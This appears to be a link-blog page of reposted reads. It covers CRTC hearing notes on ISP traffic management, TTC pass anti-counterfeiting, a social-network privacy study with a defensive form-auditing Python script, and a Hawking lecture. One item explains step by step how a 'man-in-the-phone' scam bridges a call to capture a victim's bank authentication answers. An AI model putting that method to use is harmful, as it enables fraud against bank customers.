2. No ITMPs other than normal network management should ever be imposed by a dominant carrier on wholesale access customers. Wholesale access customers should be able to decide their own practices, subject only to the CRTC, and if the dominant carrier oversteps its boundaries, the CRTC should step in. Bell's contention that it can't identify whether the traffic is being controlled by its own users or a wholesaler's is a red herring and isn't true.
3. The CRTC should take a pragmatic, case-by-case approach to assessing the use of ITMPs. Not every control will be problematic. For example, with spamming, ITMPs are considered reasonable. The reasonableness of other measures might be judged by assessing whether such arrangements are applied to all content providers.
Paul Frizado –
How should ISPs deal with congestion? Regardless of the view on traffic, the best approach to network management is the same:
1. Network planning and engineering
2. Compliance with laws of general application
3. Measures that are agnostic in their treatment of content
4. ‘CAP'-based measures (content/application/protocol-based): measures based on the latency of an application, blocking, expediting, throttling, deep packet inspection (DPI).
Are CAP measures necessary? Yes, in some cases. The debate around DPI has become inflammatory for nothing. It's just one tool among many for a larger network management strategy, and the large ISPs have been saying this. It would be a mistake to attempt to regulate Internet technology. The solution is a marketplace where there is enough competition to provide their users differential retail options which would mitigate the issues around net neutrality and customer satisfaction.
Questions:
Chair –
You explain that traffic shaping should only apply in the retail, not wholesale, context. Won't you get congestion then? Don't you need wholesale ITMP?
MTS (Frizado) –
Once it's sold to a wholesaler, it's out of the dominant carrier's network. We're not buying Internet access like a retailer. Bell's diagram shows that they can identify the different traffic, even before DPI equipment was invented.
Chair –
Are there economic decisions that motivate Bell or a dominant carrier to traffic control usage not on their networks?
MTS -
Not that we know.
Commissioner Lamarre –
In category 1, do you really mean infrastructure building?
MTS (Frizado) –
Yes. The one exception is that some types of filtering, like anti-virus and measures to prevent denial-of-service attacks, are considered category 1.
Lamarre
Do you demonstrate to your customers the due diligence you took in determining that category 1 techniques have been applied before others?
MTS (Shepherd) –
Category 3 measures are legitimate starting points, and where services are defined around the speed of the Internet, you start with cat. 1, but cat. 3 and 4 come into play when you want to increase the quality of service being offered to customers. So they can be employed to ensure the performance of the network to end users. So the answer isn't to apply cat. 1 techniques first all the time, because cat. 3 and 4 do play an important part.
Lamarre –
Do you really need to go to cat. 4 prioritization ever?
MTS (Frizado) –
Yes for reasonable quality of service. It's not always possible to anticipate traffic surges on the network, like the Michael Jackson funeral. Traffic management was necessary because it's unpredictable. Predictable issues on the network warrant the cat. 1.
Lamarre –
In justifying a discriminatory infringement of 27(2), you mentioned that the consent from the user is an element that could help the CRTC to determine whether or not the measure was just. How do you reconcile these? Being an informed consumer is one thing, but whether or not the consumer has been informed and even consented doesn't make it just. Our market isn't such that if I have a contract for three years, and you disclose something to me about network management and I'm faced with a choice of breaking the contract, at a cost, and finding another network, at a cost, there's nothing just about it. We don't have a market with so much choice and ease of movement between them.
MTS (Griffin-Muir ) –
Once you've transparently disclosed the practice and the customer has consented (as against another ISP who doesn't disclose) then it is just. We advocate for more competition in the market. Consent is only one factor, as is the degree of choice. There's legislation around privacy and we would have to be compliant with it and couldn't force a customer into consent simply because they have no other choice of ISP. Explicit consent for marketing, let's say, doesn't seem problematic to us.
Lamarre –
Dominant, as in “dominant supplier,” is a relative term. For instance, MTS is the dominant player in Manitoba. So when you're on the dominant side of the coin, do you agree to act accordingly to the rules you've put forward today?
MTS (Griffin-Muir) –
Yes.
Commissioner Katz –
Can you tell us whether there are ITMPs employed by British Telecom? All the competition is on a retail basis, buying space from British Telecom.
MTS (Griffin-Muir) –
British Telecom is on a retail basis; it doesn't do ITMP on a wholesale basis.
Katz -
Can you clarify what you mean by exclusive content to end users?
MTS (Shepherd) -
There are customers who want quality of service agreements for their service, which it is possible to get into. If you throttle everybody else for someone, as opposed to creating agreements, there is a difference in what you're doing. If it's exclusive, there's potentially a discriminatory element that may exist. You have to assess whether the arrangement is being offered to all application providers, and the competitiveness in the market. This is an emerging area and it's not something that has been implemented in the market yet. Offering those applications might require more performance or capacity than is available.
Commissioner Candice Molnar –
If there is no traffic management on the wholesale service, as the wholesale customer, can you provide guarantees that the GAS customer would have no impact on the underlying network, even if all cat. 2/3 were pulled off of that service? If all traffic management were removed from GAS as a wholesale customer of that product, could you guarantee the incumbent that their service wouldn't be affected?
Shepherd –
Yes. Unaffected. Requires that the services you're using have the capacity. Congestion hits where multiple slams hit the Internet access piece.
Molnar –
Are there any concerns particular to the business market which you serve? E.g. SMEs use the Internet for debit cards in rural areas, lottery terminals.
MTS (Griffin-Muir) –
No, there's nothing specific. SMEs look very much like consumers in the applications they're using. Typically, large businesses aren't using the public Internet for large applications.
Commissioner Denton –
You're saying it's on the retail service provider to engage in traffic management? Yesterday they were talking about the need between the retailer to signal the wholesaler on its traffic management.
MTS (Frizado) –
That was to indicate that congestion is going on. That's a plan for the future, but not something now.
Denton –
How is your four-part classification to be implemented, if the CRTC were to accept the proposals?
MTS (Griffin-Muir) -
If you accept that beyond cat. 1, generally speaking, there is no need to go further if there is sufficient competition in the retail industry, our suggested measures could be adopted. Anything beyond that would go to the CRTC if it were allegedly discriminatory. But the CRTC shouldn't be telling us that we can't use certain types of tech like DPI.
Denton –
The complaint is that smaller players can't keep coming to the CRTC to deal with issues. So in order to do something preventative, what would you do? We want to know about how you would implement your own suggestions.
MTS (Griffin-Muir) -
We would still have it be case by case dispute resolution, but we will submit a more detailed plan in the final submissions.
TTC Security Theatre
July 7th, 2009. Published under My Recent Reads. No Comments.
pulled from Google Reader (click on title for original post)

Sometimes I find my giggles in plain sight. Today I picked up my subway pass for the month. The Toronto Transit Commission has added some “features” to make the cards more secure.
I find the sticker amusing as hell.
The TTC had this to say on their website on June 17…
From TTC.ca:
The Toronto Transit Commission is introducing new security features to its Metropass, Weekly Pass and GTA Weekly Pass in an effort to thwart an increase in counterfeiting, starting in July.
One of the added features is an activation sticker that must be removed before it can be used as valid fare on the TTC.
When the sticker is removed, a thin film is left behind on the pass where the sticker was located. Customers who have already received their July pass have noticed this film and have inquired about its presence and whether or not it should be removed. The film should NOT be removed. Doing so leaves a glue residue that gathers dirt and other particles which will then partially obscure the hologram that has been added to passes to prevent counterfeiting.
A hologram that is meant to prevent counterfeiting? They should really do their homework (note: The Wired story is from 2007).
As for the “activation” sticker; the card works just fine without it. Just saying.
High Crimes Using Low-Tech Attacks
July 7th, 2009. Published under My Recent Reads. No Comments.
pulled from Google Reader (click on title for original post)
Criminals are resurrecting low-tech attacks to siphon tens of thousands of dollars from unsuspecting victims. According to financial fraud experts, so-called “man-in-the-phone” attacks require little more than a telephone and old-fashioned con artistry. The scam works like this: The criminal calls a target, claiming to be the fraud department of the target’s bank calling to alert the mark to potential unauthorized activity. The recipient of the call is then told to please hold while a fraud specialist is brought on the line. The perpetrator then calls the victim’s bank, and bridges the call, while placing his portion of the call on mute. When the bank’s fraud department asks various questions in a bid to authenticate the victim, the criminal records the customer’s answers. Depending on the institution, the answers may include the victim’s Social Security number or national ID number, a PIN or password, and/or the amount of last deposit
The Economics of Privacy in Social Networks
July 6th, 2009. Published under My Recent Reads. No Comments.
pulled from Google Reader (click on title for original post)
We often think of social networking as Facebook, MySpace, and the also-rans, but in reality there are tons of social networks out there, dozens of which have membership in the millions. Around the world it’s quite a competitive market. Sören Preibusch and I decided to study the whole ecosystem to analyse how free-market competition has shaped the privacy practices which I’ve been complaining about. We carefully examined 45 sites, collecting over 250 data points about each site’s privacy policies, privacy controls, data collection practices, and more. The results were fascinating, as we presented this week at the WEIS conference in London. Our full paper and complete dataset are now available online as well.
We collected a lot of data, and there was a little bit of something for everybody. There was encouraging news for fans of globalisation, as we found the social networking concept popular across many cultures and languages, with the most popular sites being available in over 40 languages. There was an interesting finding from a business perspective that photo-sharing may be the killer application for social networks, as this feature was promoted far more often than sharing videos, blogging, or playing games. Unfortunately the news was mostly negative from a privacy standpoint. We found some predictable but still surprising problems. Too much unnecessary data is collected by most sites, 90% requiring a full name and DOB. Security practices are dreadful: no sites employed phishing countermeasures, and 80% of sites failed to protect password entry using TLS. Privacy policies were obfuscated and confusing, and almost half failed basic accessibility tests. Privacy controls were confusing and overwhelming, and profiles were almost universally left open by default.
The most interesting story we found, though, was how sites consistently hid any mention of privacy, until we visited the privacy policies, where they provided paid privacy seals and strong reassurances about how important privacy is. We developed a novel economic explanation for this: sites appear to craft two different messages for two different populations. Most users care about privacy but don’t think about it in day-to-day life. Sites take care to avoid mentioning privacy to them, because even mentioning privacy positively will cause them to be more cautious about sharing data. This phenomenon is known as “privacy salience” and it makes sites tread very carefully around privacy, because users must be comfortable sharing data for the site to be fun. Instead of mentioning privacy, new users are shown a huge sample of other users posting fun pictures, which encourages them to share as well. For privacy fundamentalists who go looking for privacy by reading the privacy policy, though, it is important to drum up privacy reassurance.
The privacy fundamentalists of the world may be positively influencing privacy on major sites through their pressure. Indeed, the bigger, older, and more popular sites we studied had better privacy practices overall. But the desire to limit privacy salience is also a major problem because it prevents sites from providing clear information about their privacy practices. Most users therefore can’t tell what they’re getting into, resulting in the predominance of poor practices in this “privacy jungle.”
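Two of the findings above (password entry not protected by TLS, and signup forms demanding a full name and date of birth) are things you can check mechanically against a site's signup or login page. The following is an added example written for this page; it is not code from the paper or its dataset, and the page URL, HTML and field names in it are constructed samples. It parses every form on a page, and for each form that contains a password field it reports the resolved action URL, whether the password actually travels over TLS, whether the form would put the password in the query string, and which other fields the form collects. The caveat worth carrying into any such audit: a form counts as protected only when both the page and the action are https, because an https action on a plain-http page can be rewritten by anyone on the path before the user ever types the password.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse


class FormCollector(HTMLParser):
    """Collect every <form> on a page together with its action, method and <input> fields."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)  # bare attributes such as `required` map to None
        if tag == "form":
            self._current = {
                "action": attrs.get("action") or "",
                "method": (attrs.get("method") or "get").lower(),
                "inputs": [],
            }
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["inputs"].append({
                "name": attrs.get("name") or "",
                "type": (attrs.get("type") or "text").lower(),
                "required": "required" in attrs,
            })

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def audit_forms(page_url, html):
    """Return one finding per form that contains a password field.

    password_over_tls is True only when the page itself was served over https AND
    the resolved form action is https. An http page posting to an https action is
    still exposed: a man-in-the-middle can rewrite the action before submission.
    password_in_query flags GET forms, which would leak the password into URLs,
    server logs and Referer headers.
    """
    page_scheme = urlparse(page_url).scheme.lower()
    collector = FormCollector()
    collector.feed(html)
    findings = []
    for form in collector.forms:
        if not any(i["type"] == "password" for i in form["inputs"]):
            continue
        action_url = urljoin(page_url, form["action"])  # empty action posts back to the page
        action_scheme = urlparse(action_url).scheme.lower()
        findings.append({
            "action": action_url,
            "password_over_tls": page_scheme == "https" and action_scheme == "https",
            "password_in_query": form["method"] == "get",
            # personal data the form asks for, password/submit/hidden fields excluded
            "collected": sorted(
                i["name"] for i in form["inputs"]
                if i["name"] and i["type"] not in ("password", "submit", "hidden")
            ),
        })
    return findings


# Constructed sample: a signup page served over plain http with three forms.
SAMPLE_PAGE_URL = "http://social.example/signup"
SAMPLE_HTML = """
<html><body>
<form action="/login" method="post">
  <input name="email" type="text" required>
  <input name="password" type="password" required>
  <input type="submit" value="Log in">
</form>
<form action="https://social.example/register" method="post">
  <input name="full_name" type="text" required>
  <input name="dob" type="text" required>
  <input name="password" type="password" required>
  <input name="newsletter" type="checkbox">
</form>
<form action="/search" method="get">
  <input name="q" type="text">
</form>
</body></html>
"""

if __name__ == "__main__":
    for finding in audit_forms(SAMPLE_PAGE_URL, SAMPLE_HTML):
        print(finding)
```

Run against the constructed sample, the login form is flagged because it posts to http, and the registration form is flagged too even though its action is https, since the page carrying it was served over http; the same HTML served from an https page URL passes both. The `collected` list is the raw material for the kind of data-collection tally the study reports.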
Stephen Hawking: “Humans Have Entered a New Stage of Evolution”
July 3rd, 2009. Published under My Recent Reads. No Comments.
pulled from Google Reader (click on title for original post)
Although it has taken homo sapiens several million years to evolve from the apes, the useful information in our DNA has probably changed by only a few million bits. So the rate of biological evolution in humans, Stephen Hawking points out in his Life in the Universe lecture, is about a bit a year.
“By contrast,” Hawking says, “there are about 50,000 new books published in the English language each year, containing of the order of a hundred billion bits of information. Of course, the great majority of this information is garbage, and no use to any form of life. But, even so, the rate at which useful information can be added is millions, if not billions, higher than with DNA.”
This means, Hawking says, that we have entered a new phase of evolution. “At first, evolution proceeded by natural selection, from random mutations. This Darwinian phase lasted about three and a half billion years, and produced us, beings who developed language, to exchange information.”
But what distinguishes us from our cave man ancestors is the knowledge that we have accumulated over the last ten thousand years, and particularly, Hawking points out, over the last three hundred.
“I think it is legitimate to take a broader view, and include externally transmitted information, as well as DNA, in the evolution of the human race,” Hawking said.
In the last ten thousand years the human species has been in what Hawking calls, “an external transmission phase,” where the internal record of information, handed down to succeeding generations in DNA, has not changed significantly. “But the external record, in books, and other long lasting forms of storage,” Hawking says, “has grown enormously. Some people would use the term, evolution, only for the internally transmitted genetic material, and would object to it being applied to information handed down externally. But I think that is too narrow a view. We are more than just our genes.”
The time scale for evolution, in the external transmission period, has collapsed to about 50 years, or less.
Meanwhile, Hawking observes, our human brains “with which we process this information have evolved only on the Darwinian time scale, of hundreds of thousands of years. This is beginning to cause problems. In the 18th century, there was said to be a man who had read every book written. But nowadays, if you read one book a day, it would take you about 15,000 years to read through the books in a national Library. By which time, many more books would have been written.”
But we are now entering a new phase, of what Hawking calls “self designed evolution,” in which we will be able to change and improve our DNA. “At first,” he continues, “these changes will be confined to the repair of genetic defects, like cystic fibrosis, and muscular dystrophy. These are controlled by single genes, and so are fairly easy to identify, and correct. Other qualities, such as intelligence, are probably controlled by a large number of genes. It will be much more difficult to find them, and work out the relations between them. Nevertheless, I am sure that during the next century, people will discover how to modify both intelligence, and instincts like aggression.”
If the human race manages to redesign itself to reduce or eliminate the risk of self-destruction, we will probably reach out to the stars and colonize other planets. But this will be done, Hawking believes, with intelligent machines based on mechanical and electronic components rather than macromolecules, which could eventually replace DNA-based life, just as DNA may have replaced an earlier form of life.
Casey Kazan
Related Galaxy posts:
The 10,000 Year Explosion: Has Human Civilization Turbo Charged Evolution?
Homo Sapiens - The “Time Travelers” - A Galaxy Classic
“Hyper-Speed” Evolution Discovered
Bringing Ancient Human Viruses Back to Life: A Jurassic Park or Salvation?
Source: http://www.rationalvedanta.net/node/131
Optical Computer Closer: Optical Transistor Made From Single Molecule
July 2nd, 2009. Published under My Recent Reads. No Comments.
Researchers have successfully created an optical transistor from a single molecule. This has brought them one step closer to an optical computer.